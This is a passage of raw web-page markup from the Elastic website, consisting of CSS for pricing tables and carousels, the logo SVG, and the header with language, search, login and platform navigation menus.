rgba(152,162,179,0.25);-o-box-shadow:0 10px 20px 0 rgba(152,162,179,0.25);-ms-box-shadow:0 10px 20px 0 rgba(152,162,179,0.25);box-shadow:0 10px 20px 0 rgba(152,162,179,0.25);}.carousel .carousel-asset-code .carousel-asset-code-block .react-tabs__tab-panel{height:484px;overflow:auto;width:100%;}.carousel .carousel-asset-code .prettyprint{background-color:var(--color-light-gray);border:0px none !important;left:0;margin:20px auto 0;padding:16px;position:absolute;right:0;width:675px;}.carousel .carousel-asset-code .prettyprint ol li{background:none;}.carousel .carousel-asset-code .prettyprint .linenums{color:#999;display:contents;}.carousel .carousel-asset-code .prettyprint code{display:inline-block;left:0;overflow:hidden;position:relative;vertical-align:top;white-space:pre-wrap;width:90%;word-break:break-word;}.carousel .carousel-description{width:auto;max-width:854px;text-align:center;padding:0px 16px;margin-right:auto;margin-left:auto;}.carousel .icon-text-card-deck .container{padding-left:0px !important;padding-right:0px !important;}.carousel .icon-text-card.card .card-body{text-align:left;}.carousel .icon-text-card.card .card-body h3{font-size:24px;line-height:28px;}.carousel .icon-text-card.card .card-footer{text-align:left;}.carousel .icon-text-card.card .card-footer .card-footer{margin-top:16px !important;}@media screen and (max-width:991px) and (min-width:768px){.carousel .card.icon-text-card{width:100%;}}@media screen and (max-width:768px){.carousel .carousel .description{width:100%;margin:32px auto 8px auto;}}@media screen and (max-width:575px){.carousel .react-tabs__tab h2{font-size:14px !important;line-height:24px !important;}.carousel .icon-text-card-deck{margin:auto;}}.training .rail>div{position:relative;}.euiComboBox .euiFormControlLayoutIcons{position:absolute !important;}.euiComboBox .euiFormControlLayoutCustomIcon--clickable{border:0;background-color:transparent;padding:0;}.euiComboBox .euiFormControlLayoutClearButton{display:flex;justify-content:center;align-items:center;border:1px solid #98A2B3;}.css-1yifmy7-euiBadge-hollow{display:flex;align-items:center;}.euiBadge__iconButton.css-iqdgtj-euiBadge__iconButton-right{border:0;background:transparent;padding:0;}.euiComboBoxOptionsList__rowWrap{border-radius:6px;}.euiComboBoxOptionsList__rowWrap .euiFilterSelectItem{border:0;background:#fff;border-bottom:1px solid #EEF2F7;font-size:14px;font-weight:400;display:flex;align-items:center;}.euiComboBoxOptionsList__rowWrap .euiFilterSelectItem-isFocused{background-color:rgba(0,119,204,0.1);}@media (max-width:767px){.horizontal-scroll-table{width:100vw;overflow-x:auto;}}.comparison-table{max-width:830px;margin:0 auto;}.comparison-table thead{border-bottom:4px solid #000;}.comparison-table th{text-transform:uppercase;font-weight:700;letter-spacing:0.1em;padding:1rem 1.5rem;text-align:center;}.comparison-table td{padding:1rem 1.5rem;}.comparison-table td:not(:first-child){text-align:center;}.comparison-table tbody{font-size:0.875rem;}.comparison-table tbody tr{border-bottom:1px solid #ccc;}.comparison-table tfoot td{width:100%;color:#ccc;}.pricing-card.bg-dark-teal,.list.bg-dark-teal{--bullet-color:var(--color-dark-teal);}.pricing-card.bg-yellow,.list.bg-yellow{--bullet-color:var(--color-yellow);}.pricing-card.bg-elastic-teal,.list.bg-elastic-teal{--bullet-color:var(--color-elastic-teal);}.pricing-card.bg-pink,.list.bg-pink{--bullet-color:var(--color-pink);}.pricing-card.bg-blurple,.list.bg-blurple{--bullet-color:var(--color-blurple);}.list.dark-teal{--bullet-color:var(--color-dark-teal);}.list.yellow{--bullet-color:var(--color-yellow);}.list.elastic-teal{--bullet-color:var(--color-elastic-teal);}.list.pink{--bullet-color:var(--color-pink);}.list.blurple{--bullet-color:var(--color-blurple);}.serverless-pricing-table{width:100%;border-spacing:32px 0;table-layout:fixed;height:1px;}.serverless-pricing-table h4{letter-spacing:-0.04em;line-height:1.1;}.serverless-pricing-table tr{height:100%;}@media (min-width:767px){.serverless-pricing-table tr{border-bottom:1px solid var(--color-dark-gray);}}.serverless-pricing-table tr:last-child{border:none;}@media (max-width:767px){.serverless-pricing-table tr:not(:first-of-type){display:none;visibility:hidden;}}.serverless-pricing-table th{padding:0 0.5rem;}.serverless-pricing-table th:first-child{padding:0 1rem 1.5rem;}.serverless-pricing-table th:last-child{padding-right:0;}.serverless-pricing-table td,.serverless-pricing-table th{padding:0 0.5rem;vertical-align:top;height:100%;}.serverless-pricing-table td:first-child,.serverless-pricing-table th:first-child{padding:1.5rem 1rem 0 1.5rem;}@media (max-width:767px){.serverless-pricing-table td:first-child,.serverless-pricing-table th:first-child{border-bottom:none;padding:0;margin:0;}}.serverless-pricing-table td:last-child,.serverless-pricing-table th:last-child{padding-right:0;}@media (max-width:767px){.serverless-pricing-table td,.serverless-pricing-table th{display:block;height:initial;padding:0;margin:0 0 1.5rem;border-bottom:1px solid var(--color-dark-gray);}}.serverless-pricing-table td.feature-label,.serverless-pricing-table th.feature-label{font-family:'MierB','Inter',Arial,sans-serif;font-size:1.25rem;font-weight:700;letter-spacing:-0.02em;padding:1.5rem 1rem 1.5rem 1.5rem;}.serverless-pricing-table td.feature-label span:last-child,.serverless-pricing-table th.feature-label span:last-child{margin-top:6px;display:block;font-weight:normal;}.serverless-pricing-table td.feature,.serverless-pricing-table th.feature{vertical-align:middle;text-align:center;}.serverless-pricing-table td.feature .card-content,.serverless-pricing-table th.feature .card-content{padding:24px 0;height:100%;display:flex;flex-direction:column;justify-content:center;}.serverless-pricing-table td.feature .card-content *,.serverless-pricing-table th.feature .card-content *{vertical-align:middle;}.serverless-pricing-table .card-content{border-left:1px solid var(--color-dark-gray);border-right:1px solid var(--color-dark-gray);background:#fff;padding:0 0.5rem;}.serverless-pricing-table .card-content__container{padding:0 0.5rem 1.5rem;display:flex;flex-flow:column nowrap;align-items:center;justify-content:space-between;}.serverless-pricing-table .card-content__container p{margin:0;}.serverless-pricing-table .card-content__container .button{width:max-content;margin:0 auto;align-self:end;}.serverless-pricing-table .card-content__content{flex:1;display:grid;}.serverless-pricing-table .card-content.header{display:flex;flex-flow:column nowrap;justify-content:space-between;}.serverless-pricing-table .button-unstyled{padding:8px 24px;min-height:50px;display:inline-block;border:2px solid transparent;width:max-content;margin:0 auto;align-self:end;}.serverless-pricing-table .header{padding:0;}.serverless-pricing-table .card-content__header,.serverless-pricing-table .card-content__includes{padding:0 0.5rem;}.serverless-pricing-table .card-content__includes{padding:2rem 0.5rem;border-top:1px solid var(--color-dark-gray);}.serverless-pricing-table .border-bottom{border-bottom:1px solid var(--color-dark-gray);border-bottom-left-radius:16px;border-bottom-right-radius:16px;}.serverless-pricing-table .borderless-bottom{border-bottom:none;}.serverless-pricing-table .pricing-card{border-top-left-radius:16px;border-top-right-radius:16px;height:100%;padding-top:16px;}.serverless-pricing-table .pricing-card .card-label{padding:0.875rem 0;}.serverless-pricing-table .pricing-card .header{height:100%;border-top-left-radius:16px;border-top-right-radius:16px;border-top:1px solid var(--color-dark-gray);}.serverless-pricing-table .topic-heading{color:var(--color-light-ink);font-size:1rem;font-weight:700;line-height:22px;letter-spacing:0.1em;text-transform:uppercase;}.serverless-pricing-table .price{font-family:'MierB','Inter',Arial,sans-serif;font-size:1.75rem;font-weight:700;letter-spacing:-0.04em;margin-top:8px;}.serverless-pricing-table .list{max-width:250px;width:max-content;margin:0 auto;text-align:left;text-indent:-1.5rem;}.serverless-pricing-table .list li{font-weight:normal;margin-bottom:0.75rem;}.serverless-pricing-table .list li:before{content:"✓";position:relative;top:-2px;left:0;display:inline-block;background-color:var(--bullet-color,black);border-radius:50%;border-style:none;height:16px;width:16px;font-size:0.75rem;line-height:normal;color:#fff;padding-top:0;padding-left:3px;margin-right:0.5rem;text-indent:0;}.mobile-container{border-top:1px solid var(--color-dark-gray);margin:2rem 0 0;padding:1rem 0 0;}@media (min-width:767px){.mobile-container{display:none;visibility:hidden;}}.mobile-container__item{margin:1rem 0;}.mobile-container .topic-heading{padding-bottom:0.25rem;}.mobile-container__price-heading{font-weight:normal;}.mobile-container__price{font-weight:700;}.card-content--stretch .card-content__includes{min-height:373px;}.feature .pricing{margin:0 0 1rem;}.optional-eyebrow{display:block;font-size:1rem;text-transform:uppercase;color:var(--color-dark-teal);letter-spacing:0.1rem;}.pill>.topic-heading{font-size:0.875rem;}#LbltempCheckBoxforForm{padding-left:20px;}#marketo-fe-form .mktoForm .mktoFieldWrap .mktoCheckboxList{margin:0;}#LbltempCheckbox1{padding-left:20px;}#tempCheckbox1{margin-top:5px;}</style></head><body><noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-58RLH5" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript><div id="__next" data-reactroot=""><div class="progress-container"><div class="progress-bar" id="myBar"></div></div><div class="skip-links"><style data-emotion="css bivm3i-euiSkipLink-euiScreenReaderOnly">.css-bivm3i-euiSkipLink-euiScreenReaderOnly{-webkit-transition:none!important;transition:none!important;}.css-bivm3i-euiSkipLink-euiScreenReaderOnly:focus{-webkit-animation:none!important;animation:none!important;}.css-bivm3i-euiSkipLink-euiScreenReaderOnly:not(:focus):not(:active):not(:focus-within){position:absolute;inset-block-start:auto;inset-inline-start:-10000px;inline-size:1px;block-size:1px;clip:rect(0 0 0 0);-webkit-clip-path:inset(50%);clip-path:inset(50%);overflow:hidden;margin:-1px;}</style><style data-emotion="css 1ya6sd9-fill-primary-euiSkipLink-euiScreenReaderOnly">.css-1ya6sd9-fill-primary-euiSkipLink-euiScreenReaderOnly{color:#FFF;background-color:#07C;outline-color:#000;-webkit-transition:none!important;transition:none!important;}@media screen and (prefers-reduced-motion: no-preference){.css-1ya6sd9-fill-primary-euiSkipLink-euiScreenReaderOnly{-webkit-transition:-webkit-transform 250ms ease-in-out,background-color 250ms ease-in-out;transition:transform 250ms ease-in-out,background-color 250ms ease-in-out;}.css-1ya6sd9-fill-primary-euiSkipLink-euiScreenReaderOnly:hover:not(:disabled){-webkit-transform:translateY(-1px);-moz-transform:translateY(-1px);-ms-transform:translateY(-1px);transform:translateY(-1px);}.css-1ya6sd9-fill-primary-euiSkipLink-euiScreenReaderOnly:focus{-webkit-animation:euiButtonActive 250ms cubic-bezier(.34, 1.61, .7, 1);animation:euiButtonActive 250ms cubic-bezier(.34, 1.61, .7, 1);}.css-1ya6sd9-fill-primary-euiSkipLink-euiScreenReaderOnly:active:not(:disabled){-webkit-transform:translateY(1px);-moz-transform:translateY(1px);-ms-transform:translateY(1px);transform:translateY(1px);}}.css-1ya6sd9-fill-primary-euiSkipLink-euiScreenReaderOnly:focus{-webkit-animation:none!important;animation:none!important;}.css-1ya6sd9-fill-primary-euiSkipLink-euiScreenReaderOnly:not(:focus):not(:active):not(:focus-within){position:absolute;inset-block-start:auto;inset-inline-start:-10000px;inline-size:1px;block-size:1px;clip:rect(0 0 0 0);-webkit-clip-path:inset(50%);clip-path:inset(50%);overflow:hidden;margin:-1px;}</style><style data-emotion="css 1vo6hom-euiButtonDisplay-s-defaultMinWidth-s-fill-primary-euiSkipLink-euiScreenReaderOnly">.css-1vo6hom-euiButtonDisplay-s-defaultMinWidth-s-fill-primary-euiSkipLink-euiScreenReaderOnly{display:inline-block;-webkit-appearance:none;-moz-appearance:none;-ms-appearance:none;appearance:none;cursor:pointer;white-space:nowrap;max-inline-size:100%;vertical-align:middle;font-weight:500;padding:0 12px;block-size:32px;line-height:32px;font-size:1.0000rem;line-height:1.4286rem;min-inline-size:112px;border-radius:4px;color:#FFF;background-color:#07C;outline-color:#000;-webkit-transition:none!important;transition:none!important;}.css-1vo6hom-euiButtonDisplay-s-defaultMinWidth-s-fill-primary-euiSkipLink-euiScreenReaderOnly:hover:not(:disabled),.css-1vo6hom-euiButtonDisplay-s-defaultMinWidth-s-fill-primary-euiSkipLink-euiScreenReaderOnly:focus{-webkit-text-decoration:underline;text-decoration:underline;}@media screen and (prefers-reduced-motion: no-preference){.css-1vo6hom-euiButtonDisplay-s-defaultMinWidth-s-fill-primary-euiSkipLink-euiScreenReaderOnly{-webkit-transition:-webkit-transform 250ms ease-in-out,background-color 250ms ease-in-out;transition:transform 250ms ease-in-out,background-color 250ms ease-in-out;}.css-1vo6hom-euiButtonDisplay-s-defaultMinWidth-s-fill-primary-euiSkipLink-euiScreenReaderOnly:hover:not(:disabled){-webkit-transform:translateY(-1px);-moz-transform:translateY(-1px);-ms-transform:translateY(-1px);transform:translateY(-1px);}.css-1vo6hom-euiButtonDisplay-s-defaultMinWidth-s-fill-primary-euiSkipLink-euiScreenReaderOnly:focus{-webkit-animation:euiButtonActive 250ms cubic-bezier(.34, 1.61, .7, 1);animation:euiButtonActive 250ms cubic-bezier(.34, 1.61, .7, 1);}.css-1vo6hom-euiButtonDisplay-s-defaultMinWidth-s-fill-primary-euiSkipLink-euiScreenReaderOnly:active:not(:disabled){-webkit-transform:translateY(1px);-moz-transform:translateY(1px);-ms-transform:translateY(1px);transform:translateY(1px);}}.css-1vo6hom-euiButtonDisplay-s-defaultMinWidth-s-fill-primary-euiSkipLink-euiScreenReaderOnly:focus{-webkit-animation:none!important;animation:none!important;}.css-1vo6hom-euiButtonDisplay-s-defaultMinWidth-s-fill-primary-euiSkipLink-euiScreenReaderOnly:not(:focus):not(:active):not(:focus-within){position:absolute;inset-block-start:auto;inset-inline-start:-10000px;inline-size:1px;block-size:1px;clip:rect(0 0 0 0);-webkit-clip-path:inset(50%);clip-path:inset(50%);overflow:hidden;margin:-1px;}</style><a href="#main-content" rel="noreferrer" class="euiSkipLink css-1vo6hom-euiButtonDisplay-s-defaultMinWidth-s-fill-primary-euiSkipLink-euiScreenReaderOnly"><style data-emotion="css 1km4ln8-euiButtonDisplayContent">.css-1km4ln8-euiButtonDisplayContent{block-size:100%;inline-size:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;-webkit-justify-content:center;justify-content:center;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;vertical-align:middle;gap:8px;}</style><span class="css-1km4ln8-euiButtonDisplayContent"><span class="eui-textTruncate">Skip to main content</span></span></a></div><header class="jsx-1868079691 primary header-wrapper render-oldNav"><div data-component-theme="" class="oldNav Index_navigation__kp9_7" id="navigation_container"><div class="Index_navigation_container__AMYLs"><div data-component-theme="" class="Index_navigation_header__KYvRr"><a class="brand" href="/"><span class="jsx-1189744782 elastic-logo"><span class="jsx-1189744782 sr-only">Elastic</span><svg width="117" height="40" viewBox="0 0 117 40" fill="none" xmlns="http://www.w3.org/2000/svg" class="jsx-1189744782"><g class="jsx-1189744782"><path d="M40.1527 20.9588C40.1527 17.5986 38.0653 14.6457 34.9257 13.5087C35.0615 12.7959 35.1294 12.0831 35.1294 11.3534C35.1294 5.09121 30.0382 -1.52588e-05 23.793 -1.52588e-05C20.1273 -1.52588e-05 16.7331 1.74797 14.5948 4.70088C13.5426 3.88628 12.2529 3.44505 10.9122 3.44505C7.58591 3.44505 4.88757 6.14339 4.88757 9.46965C4.88757 10.1994 5.02333 10.9122 5.26092 11.574C2.13831 12.6941 0 15.6979 0 19.0411C0 22.4183 2.10437 25.3712 5.24395 26.5083C5.10819 27.2041 5.0403 27.9338 5.0403 28.6635C5.0403 34.9088 10.1146 39.983 16.3598 39.983C20.0255 39.983 23.4196 38.2181 25.5409 35.2651C26.5931 36.0967 27.8829 36.5549 29.2236 36.5549C32.5498 36.5549 35.2482 33.8566 35.2482 30.5303C35.2482 29.8006 35.1124 29.0878 34.8748 28.4259C37.9974 27.3059 40.1527 24.3021 40.1527 20.9588Z" fill="white" class="jsx-1189744782"></path><path d="M15.7824 17.2253L24.5732 21.2304L33.432 13.4578C33.5677 12.8129 33.6186 12.185 33.6186 11.5061C33.6186 6.04156 29.1723 1.59523 23.7077 1.59523C20.4324 1.59523 17.3946 3.20745 15.5448 5.9058L14.0684 13.5596L15.7824 17.2253Z" fill="#FED10A" class="jsx-1189744782"></path><path d="M6.68665 26.5253C6.55088 27.1702 6.49997 27.832 6.49997 28.5108C6.49997 33.9924 10.9633 38.4387 16.4448 38.4387C19.7371 38.4387 22.8088 36.8095 24.6587 34.0942L26.1181 26.4744L24.1665 22.7408L15.3417 18.7187L6.68665 26.5253Z" fill="#24BBB1" class="jsx-1189744782"></path><path d="M6.63518 11.3195L12.6598 12.745L13.9835 5.90583C13.1689 5.27791 12.1507 4.93849 11.0985 4.93849C8.48499 4.93849 6.34668 7.05983 6.34668 9.69029C6.34668 10.2503 6.4485 10.8104 6.63518 11.3195Z" fill="#EF5098" class="jsx-1189744782"></path><path d="M6.10983 12.762C3.42846 13.6444 1.54471 16.224 1.54471 19.0581C1.54471 21.8243 3.25875 24.2851 5.82133 25.2694L14.2728 17.6326L12.7284 14.3233L6.10983 12.762Z" fill="#1BA9F5" class="jsx-1189744782"></path><path d="M26.186 34.0942C27.0176 34.7221 28.0189 35.0785 29.0541 35.0785C31.6676 35.0785 33.8059 32.9571 33.8059 30.3267C33.8059 29.7497 33.7041 29.1896 33.5174 28.6805L27.5098 27.2719L26.186 34.0942Z" fill="#93C83E" class="jsx-1189744782"></path><path d="M27.4075 25.6937L34.0261 27.238C36.7245 26.3555 38.5912 23.776 38.5912 20.9249C38.5912 18.1757 36.8772 15.6979 34.3146 14.7306L25.6595 22.3165L27.4075 25.6937Z" fill="#0B64DD" class="jsx-1189744782"></path><path fill-rule="evenodd" clip-rule="evenodd" d="M60.3483 29.8175V9.96179H62.4187V29.8175H60.3483ZM56.1393 28.0865L56.937 28.0017L56.9879 29.6309C54.8835 29.9194 53.0846 30.0721 51.5912 30.0721C49.6056 30.0721 48.197 29.4951 47.3655 28.3411C46.5339 27.1871 46.1266 25.3882 46.1266 22.9614C46.1266 18.1077 48.0613 15.6809 51.9136 15.6809C53.7804 15.6809 55.172 16.207 56.0884 17.2422C57.0048 18.2775 57.463 19.9236 57.463 22.1468L57.3443 23.7251H48.214C48.214 25.2524 48.4855 26.3895 49.0456 27.1192C49.6056 27.8489 50.556 28.2223 51.9306 28.2223C53.3222 28.2562 54.7138 28.2053 56.1393 28.0865ZM55.3926 22.0959C55.3926 20.3988 55.1211 19.1939 54.578 18.4981C54.035 17.8023 53.1525 17.4459 51.9306 17.4459C50.7087 17.4459 49.7753 17.8192 49.1644 18.549C48.5534 19.2787 48.231 20.4667 48.214 22.0959H55.3926ZM75.5031 26.9665V20.1612C75.5031 18.6338 75.1468 17.4968 74.417 16.784C73.7042 16.0543 72.5672 15.6979 71.0059 15.6979H65.6941V17.5307H71.1417C71.8375 17.5307 72.3975 17.7344 72.8048 18.1417C73.2121 18.549 73.4157 19.2278 73.4157 20.1612V21.3491L69.0712 21.7564C67.6117 21.8922 66.5426 22.2995 65.8638 22.9274C65.1849 23.5553 64.8455 24.5566 64.8455 25.8973C64.8455 27.255 65.1849 28.2902 65.8468 29.0029C66.5087 29.7327 67.476 30.0891 68.7488 30.0891C70.4119 30.0891 72.0581 29.7836 73.7212 29.0539C74.3557 29.6588 75.3493 29.648 76.5572 29.6349H76.5574H76.5576H76.5579C76.7391 29.6329 76.925 29.6309 77.1154 29.6309L77.2172 27.798C77.2172 27.798 75.5031 27.6623 75.5031 26.9665ZM69.0882 28.3411C67.6796 28.3411 66.9838 27.4925 66.9838 25.7955C66.9838 25.0318 67.1535 24.4378 67.5269 24.0305C67.9002 23.6232 68.4942 23.3856 69.3258 23.3178L73.4157 22.9274V27.4925L72.7878 27.7132C71.5829 28.1374 70.344 28.3411 69.0882 28.3411ZM83.5982 17.5477C81.5956 17.5477 80.5774 18.2435 80.5774 19.6521C80.5774 20.297 80.815 20.7552 81.2732 21.0267C81.7314 21.2983 82.7836 21.5698 84.4297 21.8583C86.0759 22.1468 87.2299 22.5371 87.9088 23.0632C88.5876 23.5724 88.927 24.5397 88.927 25.9652C88.927 27.3908 88.4688 28.426 87.5524 29.0878C86.6359 29.7497 85.3122 30.0891 83.5473 30.0891C82.4102 30.0891 78.5918 29.6648 78.5918 29.6648L78.7106 27.8659C79.0533 27.8978 79.3815 27.9289 79.6954 27.9586C81.3864 28.1186 82.6624 28.2393 83.5642 28.2393C84.6334 28.2393 85.448 28.0696 86.008 27.7302C86.5681 27.3908 86.8566 26.8138 86.8566 26.0161C86.8566 25.2185 86.619 24.6754 86.1438 24.3869C85.6686 24.0984 84.6164 23.8269 82.9872 23.5724C81.358 23.3178 80.204 22.9444 79.5252 22.4353C78.8463 21.9432 78.5069 21.0098 78.5069 19.6691C78.5069 18.3284 78.9821 17.3271 79.9325 16.6822C80.8828 16.0374 82.0708 15.7149 83.4794 15.7149C84.5994 15.7149 88.5027 16.0034 88.5027 16.0034V17.8193C87.8189 17.7797 87.1764 17.7364 86.5804 17.6962C85.3867 17.6157 84.3792 17.5477 83.5982 17.5477ZM94.5436 17.7853H98.939V15.9694H94.5436V11.7437H92.4901V15.9864H90.5215V17.7853H92.4901V25.0657C92.4901 27.0344 92.7617 28.375 93.3217 29.0708C93.8817 29.7666 94.866 30.123 96.3085 30.123C96.9534 30.123 97.8868 30.0212 99.1257 29.8176L98.9899 28.1035L96.5291 28.2732C95.6636 28.2732 95.1206 28.0187 94.883 27.5265C94.6624 27.0344 94.5436 25.9822 94.5436 24.4039V17.7853ZM101.824 12.8469V10.454H103.895V12.8638L101.824 12.8469ZM101.824 29.8176V15.9864H103.895V29.8176H101.824ZM115.995 16.0373C114.535 15.8167 113.5 15.6979 112.889 15.6979C110.819 15.6979 109.342 16.241 108.443 17.2931C107.56 18.3453 107.119 20.1951 107.119 22.8256C107.119 25.4561 107.543 27.3228 108.358 28.4259C109.172 29.529 110.666 30.0891 112.821 30.0891C113.67 30.0891 114.959 29.9533 116.674 29.6987L116.589 27.9847L113.33 28.2393C111.667 28.2393 110.581 27.8489 110.055 27.0513C109.529 26.2537 109.274 24.8451 109.274 22.8256C109.274 20.8061 109.563 19.4145 110.123 18.6678C110.683 17.9211 111.752 17.5477 113.313 17.5477C114.009 17.5477 115.095 17.6326 116.572 17.8023L116.657 16.1222L115.995 16.0373Z" fill="#000" class="jsx-1189744782 elastic-logo__wordmark"></path></g></svg></span></a><div class=" Actions_actions__9PoiP "><div class="Actions_action__THZjm"><button type="button" aria-label="Press down to open menu." aria-expanded="false"><span><svg class="icons_icon__n3nWe" xmlns="http://www.w3.org/2000/svg" width="20" height="20" fill="none"><g clip-path="url(#a)"><path d="M10 18.75c-1.57 0-3.125-3.89-3.125-8.75 0-4.86 1.556-8.75 3.125-8.75V0C7.428 0 5.625 4.506 5.625 10S7.428 20 10 20v-1.25ZM10 18.75c1.57 0 3.125-3.89 3.125-8.75 0-4.86-1.556-8.75-3.125-8.75V0c2.572 0 4.375 4.506 4.375 10S12.572 20 10 20v-1.25Z"></path><path d="M3.125 7.5h13.75V6.25H3.125V7.5ZM3.125 13.75h13.75V12.5H3.125v1.25Z"></path><path fill-rule="evenodd" d="M20 10c0 5.523-4.477 10-10 10S0 15.523 0 10 4.477 0 10 0s10 4.477 10 10ZM1.25 10a8.75 8.75 0 1 0 17.5 0 8.75 8.75 0 0 0-17.5 0Z" clip-rule="evenodd"></path></g><defs><clipPath id="a"><path d="M0 0h20v20H0z"></path></clipPath></defs></svg></span><span class="Actions_ButtonText__L0fen">EN</span></button><div class="Dropdown_Dropdown__pUJPf Dropdown_Dropdown--modalOnMobile__olFVq"><div class="Dropdown_DropdownContent__tGePQ"><button class="Dropdown_DropdownClose__wx62b" disabled=""><span class="Dropdown_DropdownClose_text__IoOgP">Close panel</span><svg class="icons_icon__n3nWe" xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16" fill="none"><path fill-rule="evenodd" clip-rule="evenodd" d="M6.58586 8.00008L0.292969 14.293L1.70718 15.7072L8.00008 9.41429L14.293 15.7072L15.7072 14.293L9.41429 8.00008L15.7072 1.70718L14.293 0.292969L8.00008 6.58586L1.70718 0.292969L0.292969 1.70718L6.58586 8.00008Z"></path></svg></button><div class="Dropdown_DropdownSections__G_B5O"><ul><li class="Actions_DropdownItem__z0FcS"><a class="Actions_DropdownLink__evluL">Deutsch</a></li><li class="Actions_DropdownItem__z0FcS Actions_DropdownItemActive__0GjNS"><a class="Actions_DropdownLink__evluL">English</a></li><li class="Actions_DropdownItem__z0FcS"><a class="Actions_DropdownLink__evluL">Español</a></li><li class="Actions_DropdownItem__z0FcS"><a class="Actions_DropdownLink__evluL">Français</a></li><li class="Actions_DropdownItem__z0FcS"><a class="Actions_DropdownLink__evluL">日本語</a></li><li class="Actions_DropdownItem__z0FcS"><a class="Actions_DropdownLink__evluL">한국어</a></li><li class="Actions_DropdownItem__z0FcS"><a class="Actions_DropdownLink__evluL">简体中文</a></li><li class="Actions_DropdownItem__z0FcS"><a class="Actions_DropdownLink__evluL">Português</a></li></ul></div></div></div></div><div class="Actions_action__THZjm"><button type="button"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" fill="none" class="jsx-3447688935 icon"><g fill-rule="evenodd" stroke-width=".417" clip-path="url(#a)" clip-rule="evenodd" class="jsx-3447688935"><path d="M8.332 1.99a6.346 6.346 0 1 0 0 12.693 6.346 6.346 0 0 0 0-12.693Zm-7.5 6.346a7.5 7.5 0 1 1 15 0 7.5 7.5 0 0 1-15 0Z" class="jsx-3447688935"></path><path d="m14.124 13.336 5.041 5.041-.792.792-5.041-5.04.792-.793Z" class="jsx-3447688935"></path></g><defs class="jsx-3447688935"><clipPath id="a" class="jsx-3447688935"><path d="M0 0h20v20H0z" class="jsx-3447688935"></path></clipPath></defs></svg><span class="Actions_ButtonText__L0fen Actions_ButtonTextHidden__r8BOX">Search</span></button></div><div class="Actions_action__THZjm"><a href="https://cloud.elastic.co"><svg class="icons_icon__n3nWe" xmlns="http://www.w3.org/2000/svg" width="20" height="20" fill="none"><g clip-path="url(#a)"><path fill-rule="evenodd" d="M6.252 5.416a3.75 3.75 0 1 1 7.5 0 3.75 3.75 0 0 1-7.5 0ZM10.002 0a5.417 5.417 0 0 0-3.336 9.685 8.215 8.215 0 0 0-3.384 2.245C1.602 13.782.625 16.5.625 20h1.667c0-3.196.888-5.478 2.225-6.951 1.331-1.469 3.18-2.215 5.275-2.215 2.094 0 3.943.746 5.275 2.215 1.336 1.473 2.225 3.755 2.225 6.951h1.666c0-3.501-.977-6.219-2.657-8.071A8.204 8.204 0 0 0 13.2 9.79 5.417 5.417 0 0 0 10.002 0Z" clip-rule="evenodd"></path><path d="M1.668 20.003h16.667v-1.667H1.668v1.667Z"></path></g><defs><clipPath id="a"><path d="M0 0h20v20H0z"></path></clipPath></defs></svg><span class="Actions_ButtonText__L0fen Actions_ButtonTextHidden__r8BOX">Login</span></a></div><button type="button" aria-expanded="false" class=" Control_navigation-control__dMg2m "><span class="Control_navigation-control_text__wyRQe">Toggle Navigation</span><span class="Control_navigation-control_icon__2h1YW"><span></span><span></span><span></span></span></button></div><div style="top:72px" class="Buttons_navigationButtons__QJmSA"><a class="button btn-primary btn-small" href="https://cloud.elastic.co/registration"><span class="jsx-1596590093 btn-copy">Start free trial</span></a><a class="button btn-secondary-inverted btn-small" href="/contact"><span class="jsx-1596590093 btn-copy">Contact Sales</span></a></div><div style="top:72px" class="Index_navigation_flyout__73xqL"><div class="Index_navigation_flyout_content___3G_7"><nav class="Items_navigation-items__lSmFz" aria-label="Primary navigation"><div class="Items_dropdownWrapper__hJFj3" style="width:100%;height:200px"></div><div><button class="Items_navigation-items_item__7YSef navigation-item" aria-label="Platform, press down to open menu." aria-expanded="false">Platform<svg class="icons_icon__n3nWe" xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M1.646 4.646a.5.5 0 0 1 .708 0L8 10.293l5.646-5.647a.5.5 0 0 1 .708.708l-6 6a.5.5 0 0 1-.708 0l-6-6a.5.5 0 0 1 0-.708z"></path></svg></button><div class="Dropdown_Dropdown__pUJPf "><div class="Dropdown_DropdownContent__tGePQ"><button class="Dropdown_DropdownClose__wx62b" disabled=""><span class="Dropdown_DropdownClose_text__IoOgP">Close panel</span><svg class="icons_icon__n3nWe" xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16" fill="none"><path fill-rule="evenodd" clip-rule="evenodd" d="M6.58586 8.00008L0.292969 14.293L1.70718 15.7072L8.00008 9.41429L14.293 15.7072L15.7072 14.293L9.41429 8.00008L15.7072 1.70718L14.293 0.292969L8.00008 6.58586L1.70718 0.292969L0.292969 1.70718L6.58586 8.00008Z"></path></svg></button><div class="Dropdown_DropdownSections__G_B5O"><div class="Items_Section__vJ9lm Items_spotlight-feature___wj__"><div class=" Card_nav-card__Gb2bd Card_ghost-card__kC3tT "><div class="Card_card-header__dLhyK"><a class="Card_custom-link__semnr" href="/platform"><h2 class="h5">The Search AI Company</h2></a><a class="Card_custom-link__semnr" href="/platform"><div class="Card_card-image__34JYo"><div class=" Card_thumbnail-wrapper__8kCr1 "><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/bltb72b02d269f3201a/6643847599f5a8667dc35ac7/nav-platform.png" class="Card_img-fluid__EqrlH" alt="Search, Security, Observability"/></div></div></a><a class="Card_custom-link__semnr" href="/platform"></a><a class="Card_custom-link__semnr" href="/platform"></a><a class="Card_custom-link__semnr" href="/platform"></a><a class="Card_custom-link__semnr" href="/platform"></a><a class="Card_custom-link__semnr" href="/platform"></a></div><div class="Card_card-body__81rqO"><div><p>Build tailored experiences with Elastic.</p></div><div class="d-flex flex-column"><a class="button Card_dropdown-link__qZWTu Card_dropdown-link__spaced___Q1m0 Card_btn-tertiary__f8UEk btn-tertiary" href="/platform" tabindex="-1"><span class="jsx-1596590093 btn-copy">Elastic Search AI Platform overview</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div><hr class="Card_nav-divider__yt_19"/><div><p><strong>Scale your business with Elastic Partners</strong></p></div><ul><li><a 